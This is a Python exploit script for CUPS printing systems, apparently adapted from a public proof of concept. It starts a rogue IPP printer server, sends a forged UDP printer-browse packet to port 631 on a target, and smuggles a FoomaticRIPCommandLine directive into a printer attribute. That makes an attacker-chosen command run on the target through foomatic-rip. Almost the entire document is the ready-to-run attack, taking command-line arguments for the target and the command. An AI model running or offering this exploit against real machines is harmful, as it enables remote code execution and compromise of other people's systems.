Copy #!/usr/bin/env python3
# Based off of EvilSocket's Exploit Script
# Few changes to make it more relaible
import socket
import threading
import time
import sys
from ippserver.server import IPPServer
import ippserver.behaviour as behaviour
from ippserver.server import IPPRequestHandler
from ippserver.constants import (
OperationEnum, StatusCodeEnum, SectionEnum, TagEnum
)
from ippserver.parsers import Integer, Enum, Boolean
from ippserver.request import IppRequest
class ServerContext:
def __init__(self, server):
self.server = server
self.server_thread = None
def __enter__(self):
print(f'IPP Server Listening on {server.server_address}')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def __exit__(self, exc_type, exc_value, traceback):
print('Shutting down the server...')
self.server.shutdown()
self.server_thread.join()
def handle_signal(signum, frame):
raise KeyboardInterrupt()
class MaliciousPrinter(behaviour.StatelessPrinter):
def __init__(self, command):
self.command = command
super(MaliciousPrinter, self).__init__()
def printer_list_attributes(self):
attr = {
# rfc2911 section 4.4
(
SectionEnum.printer,
b'printer-uri-supported',
TagEnum.uri
): [self.printer_uri],
(
SectionEnum.printer,
b'uri-authentication-supported',
TagEnum.keyword
): [b'none'],
(
SectionEnum.printer,
b'uri-security-supported',
TagEnum.keyword
): [b'none'],
(
SectionEnum.printer,
b'printer-name',
TagEnum.name_without_language
): [b'Main Printer'],
(
SectionEnum.printer,
b'printer-info',
TagEnum.text_without_language
): [b'Main Printer Info'],
(
SectionEnum.printer,
b'printer-make-and-model',
TagEnum.text_without_language
): [b'HP 0.00'],
(
SectionEnum.printer,
b'printer-state',
TagEnum.enum
): [Enum(3).bytes()], # XXX 3 is idle
(
SectionEnum.printer,
b'printer-state-reasons',
TagEnum.keyword
): [b'none'],
(
SectionEnum.printer,
b'ipp-versions-supported',
TagEnum.keyword
): [b'1.1'],
(
SectionEnum.printer,
b'operations-supported',
TagEnum.enum
): [
Enum(x).bytes()
for x in (
OperationEnum.print_job, # (required by cups)
OperationEnum.validate_job, # (required by cups)
OperationEnum.cancel_job, # (required by cups)
OperationEnum.get_job_attributes, # (required by cups)
OperationEnum.get_printer_attributes,
)],
(
SectionEnum.printer,
b'multiple-document-jobs-supported',
TagEnum.boolean
): [Boolean(False).bytes()],
(
SectionEnum.printer,
b'charset-configured',
TagEnum.charset
): [b'utf-8'],
(
SectionEnum.printer,
b'charset-supported',
TagEnum.charset
): [b'utf-8'],
(
SectionEnum.printer,
b'natural-language-configured',
TagEnum.natural_language
): [b'en'],
(
SectionEnum.printer,
b'generated-natural-language-supported',
TagEnum.natural_language
): [b'en'],
(
SectionEnum.printer,
b'document-format-default',
TagEnum.mime_media_type
): [b'application/pdf'],
(
SectionEnum.printer,
b'document-format-supported',
TagEnum.mime_media_type
): [b'application/pdf'],
(
SectionEnum.printer,
b'printer-is-accepting-jobs',
TagEnum.boolean
): [Boolean(True).bytes()],
(
SectionEnum.printer,
b'queued-job-count',
TagEnum.integer
): [Integer(666).bytes()],
(
SectionEnum.printer,
b'pdl-override-supported',
TagEnum.keyword
): [b'not-attempted'],
(
SectionEnum.printer,
b'printer-up-time',
TagEnum.integer
): [Integer(self.printer_uptime()).bytes()],
(
SectionEnum.printer,
b'compression-supported',
TagEnum.keyword
): [b'none'],
(
SectionEnum.printer,
b'printer-more-info',
TagEnum.uri
): [f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()],
}
attr.update(super().minimal_attributes())
return attr
def operation_printer_list_response(self, req, _psfile):
print("\ntarget connected, sending payload ...")
attributes = self.printer_list_attributes()
return IppRequest(
self.version,
StatusCodeEnum.ok,
req.request_id,
attributes)
def send_browsed_packet(ip, port, ipp_server_host, ipp_server_port):
print(f"Sending udp packet to {ip}:{port}...")
printer_type = 2
printer_state = '3'
printer_uri = f'http://{ipp_server_host}:{ipp_server_port}/printers/EVILCUPS'
printer_location = '"You Have Been Hacked"'
printer_info = '"HACKED"'
printer_model = '"HP LaserJet 1020"'
packet = f"{printer_type:x} {printer_state} {printer_uri} {printer_location} {printer_info} {printer_model} \n"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(packet.encode('utf-8'), (ip, port))
def run_server(server):
with ServerContext(server):
try:
while True:
time.sleep(.5)
except KeyboardInterrupt:
pass
server.shutdown()
if __name__ == "__main__":
if len(sys.argv) != 4:
print("%s <LOCAL_HOST> <TARGET_HOST> <COMMAND>" % sys.argv[0])
quit()
SERVER_HOST = sys.argv[1]
SERVER_PORT = 12345
command = sys.argv[3]
server = IPPServer((SERVER_HOST, SERVER_PORT),
IPPRequestHandler, MaliciousPrinter(command))
threading.Thread(
target=run_server,
args=(server, )
).start()
TARGET_HOST = sys.argv[2]
TARGET_PORT = 631
send_browsed_packet(TARGET_HOST, TARGET_PORT, SERVER_HOST, SERVER_PORT)
print("Please wait this normally takes 30 seconds...")
seconds = 0
while True:
print(f"\r{seconds} elapsed", end="", flush=True)
time.sleep(1)
seconds += 1